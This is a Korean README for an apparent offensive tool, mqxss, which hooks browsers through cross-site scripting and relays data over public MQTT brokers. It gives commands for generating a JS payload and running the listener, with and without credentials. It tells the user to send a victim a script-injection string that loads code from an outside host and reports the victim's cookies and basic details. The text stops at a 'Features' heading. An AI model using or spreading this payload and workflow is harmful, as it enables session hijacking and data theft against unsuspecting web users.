
MQTT를 통한 후킹된 브라우저 통신

이 도구를 beef나 xsshunter 대신 사용할 때의 이점은 js 페이로드를 호스팅하는 것 외에는 인프라 설정이 필요 없다는 것입니다. 공용 브로커를 사용할 수 있습니다 (단, 현재는 난독화를 사용하며, 암호화는 개발 중입니다).
후킹된 브라우저는 지정한 브로커의 MQTT 토픽에서 통신합니다. 이를 테스트할 수 있는 공개/무료 브로커가 많이 있습니다.
클라이언트는 python paho.mqtt 라이브러리를 사용하고, js 페이로드는 'mqttws31.min.js'를 사용하며, 이 파일은 여기 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'에서 가져옵니다.

JS 페이로드를 생성하려면 브라우저를 후킹하기 위해 런타임 시 -g 플래그와 함께 브로커, 포트, 토픽 변수를 설정하세요. 그러면 /js/ 폴더에 페이로드가 생성됩니다.
클라이언트를 실행하려면 브로커, 포트, 토픽을 다음과 같이 지정하세요.
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
자격 증명을 사용하여 클라이언트를 실행하려면 브로커, 포트, 사용자 이름, 비밀번호, 토픽을 다음과 같이 지정하세요.
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
mqxss 클라이언트가 실행되는 동안 XSS 페이로드를 전송하세요. 피해자에게 보내세요. 예: '"><script src=https://example.com/x.js async></script> 또는 이와 유사한 것. 취약하다면 브라우저가 연결되었고 쿠키 등 기본 정보를 포함한 알림을 받게 됩니다.

기능: